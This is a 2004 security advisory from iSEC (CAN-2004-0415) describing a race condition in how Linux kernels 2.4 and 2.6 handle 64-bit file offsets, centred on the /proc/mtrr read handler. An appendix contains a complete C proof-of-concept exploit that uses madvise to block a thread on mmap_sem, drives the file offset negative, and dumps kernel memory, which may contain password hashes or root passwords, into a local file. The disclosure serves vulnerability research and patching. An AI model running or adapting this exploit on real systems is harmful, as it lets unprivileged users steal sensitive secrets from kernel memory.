Synopsis: Linux kernel file offset pointer handling Product: Linux kernel Version: 2.4 up to to and including 2.4.26, 2.6 up to to and including 2.6.7 Vendor: http://www.kernel.org/ URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt CVE: CAN-2004-0415 Author: Paul Starzetz Date: Aug 04, 2004 Issue: ====== A critical security vulnerability has been found in the Linux kernel code handling 64bit file offset pointers. Details: ======== The Linux kernel offers a file handling API to the userland applications. Basically a file can be identified by a file name and opened through the open(2) system call which in turn returns a file descriptor for the kernel file object. One of the properties of the file object is something called 'file offset' (f_pos member variable of the file object), which is advanced if one reads or writtes to the file. It can also by changed through the lseek(2) system call and identifies the current writing/reading position inside the file image on the media. There are two different versions of the file handling API inside recent Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have identified numerous places, where invalid conversions from 64 bit sized file offsets to 32 bit ones as well as insecure access to the file offset member variable take place. We have found that most of the /proc entries (like /proc/version) leak about one page of unitialized kernel memory and can be exploited to obtain sensitive data. We have found dozens of places with suspicious or bogus code. One of them resides in the MTRR handling code for the i386 architecture: static ssize_t mtrr_read(struct file *file, char *buf, size_t len, loff_t *ppos) { [1] if (*ppos >= ascii_buf_bytes) return 0; [2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos; if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT; [3] *ppos += len; return len; } /* End Function mtrr_read */ It is quite easy to see that since copy_to_user can sleep, the second reference to *ppos may use another value. Or in other words, code operating on the file->f_pos variable through a pointer must be atomic in respect to the current thread. We expect even more troubles in the SMP case though. Exploitation: ============= In the following we want to concentrate onto the mttr.c code, however we think that also other f_pos handling code in the kernel may be exploitable. The idea is to use the blocking property of copy_to_user to advance the file->f_pos file offset to be negative allowing us to bypass the two checks marked with [1] and [2] in the above code. There are two situation where copy_to_user() will sleep if there is no page table entry for the corresponding location in the user buffer used to receive the data: - the underlying buffer maps a file which is not in the kernel page cache yet. The file content must be read from the disk first - the mmap_sem semaphore of the process's VM is in a closed state, that is another thread sharing the same VM caused a down_write on the semaphore. We use the second method as follows. One of two threads sharing same VM issues a madvise(2) call on a VMA that maps some, sufficiently big file setting the madvise flag to WILLNEED. This will issue a down_write on the mmap semaphore and schedule a read-ahead request for the mmaped file. Second thread issues in the mean time a read on the /proc/mtrr file thus going for sleep until the first thread returns from the madvise system call. The two threads will be woken up in a FIFO manner thus the first thread will run as first and can advance the file pointer of the proc file to the maximum possible value of 0x7fffffffffffffff while the second thread is still waiting in the scheduler queue for CPU (itn the non-SMP case). After the place marked with [3] has been executed, the file position will have a negative value and the checks [1] and [2] can be passed for any buffer length supplied, thus leaking the kernel memory from the address of ascii_buffer on to the user space. We have attached a proof-of-concept exploit code to read portions of kernel memory. Another exploit code we have at our disposal can use other /proc entries (like /proc/version) to read one page of kernel memory. Impact: ======= Since no special privileges are required to open the /proc/mtrr file for reading any process may exploit the bug to read huge parts of kernel memory. The kernel memory dump may include very sensitive information like hashed passwords from /etc/shadow or even the root passwort. We have found in an experiment that after the root user logged in using ssh (in our case it was OpenSSH using PAM), the root passwort was keept in kernel memory. This is very suprising since sshd will quickly clean (overwrite with zeros) the memory portion used to store the password. But the password may have made its way through various kernel paths like pipes or sockets. Tested and known to be vulnerable kernel versions are all <= 2.4.26 and <= 2.6.7. All users are encouraged to patch all vulnerable systems as soon as appropriate vendor patches are released. There is no hotfix for this vulnerability. Credits: ======== Paul Starzetz has identified the vulnerability and performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS. Disclaimer: =========== This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected. Appendix: ========= /* * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include // define machine mem size in MB #define MEMSIZE 64 _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh); void fatal(const char *msg) { printf("\n"); if(!errno) { fprintf(stderr, "FATAL ERROR: %s\n", msg); } else { perror(msg); } printf("\n"); fflush(stdout); fflush(stderr); exit(31337); } static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE, size=PAGE_SIZE, us; static volatile int go[2]; static loff_t off; static char *buf=NULL, *file, child_stack[PAGE_SIZE]; static struct timeval tv1, tv2; static struct stat st; // child close sempahore & sleep int start_child(void *arg) { // unlock parent & close semaphore go[0]=0; madvise(file, csize, MADV_DONTNEED); madvise(file, csize, MADV_SEQUENTIAL); gettimeofday(&tv1, NULL); read(pfd, buf, 0); go[0]=1; r = madvise(file, csize, MADV_WILLNEED); if(r) fatal("madvise"); // parent blocked on mmap_sem? GOOD! if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) { r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET); if( r == -1 ) fatal("lseek"); printf("\n[+] Race won!"); fflush(stdout); go[0]=2; } else { printf("\n[-] Race lost %d, use another file!\n", go[1]); fflush(stdout); kill(getppid(), SIGTERM); } _exit(1); return 0; } void usage(char *name) { printf("\nUSAGE: %s ", name); printf("\n\n"); exit(1); } int main(int ac, char **av) { if(ac<2) usage(av[0]); // mmap big file not in cache r=stat(av[1], &st); if(r) fatal("stat file"); csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1); fd=open(av[1], O_RDONLY); if(fd<0) fatal("open file"); file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0); if(file==MAP_FAILED) fatal("mmap"); close(fd); printf("\n[+] mmaped uncached file at %p - %p", file, file+csize); fflush(stdout); pfd=open("/proc/mtrr", O_RDONLY); if(pfd<0) fatal("open"); fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644); if(fd<0) fatal("open data"); r=ftruncate(fd, fsize); if(r<0) fatal("ftruncate"); buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if(buf==MAP_FAILED) fatal("mmap"); close(fd); printf("\n[+] mmaped kernel data file at %p", buf); fflush(stdout); // clone thread wait for child sleep nc = nice(0); cpid=clone(&start_child, child_stack + sizeof(child_stack)-4, CLONE_FILES|CLONE_VM, NULL); nice(19-nc); while(go[0]==0) { i++; } // try to read & sleep & move fpos to be negative gettimeofday(&tv1, NULL); go[1] = 1; r = read(pfd, buf, size ); go[1] = 2; gettimeofday(&tv2, NULL); if(r<0) fatal("read"); while(go[0]!=2) { i++; } us = tv2.tv_sec - tv1.tv_sec; us *= 1000000; us += (tv2.tv_usec - tv1.tv_usec) ; printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout); r = _llseek(pfd, 0, 0, &off, SEEK_CUR); if(r < 0 ) { printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n"); fflush(stdout); i=0; for(;;) { r = read(pfd, buf, PAGE_SIZE ); if(r!=PAGE_SIZE) break; buf += PAGE_SIZE; i++; printf("\r PAGE %6d", i); fflush(stdout); } printf("\n[+] done, err=%s", strerror(errno) ); fflush(stdout); } close(pfd); printf("\n"); sleep(1); kill(cpid, 9); return 0; }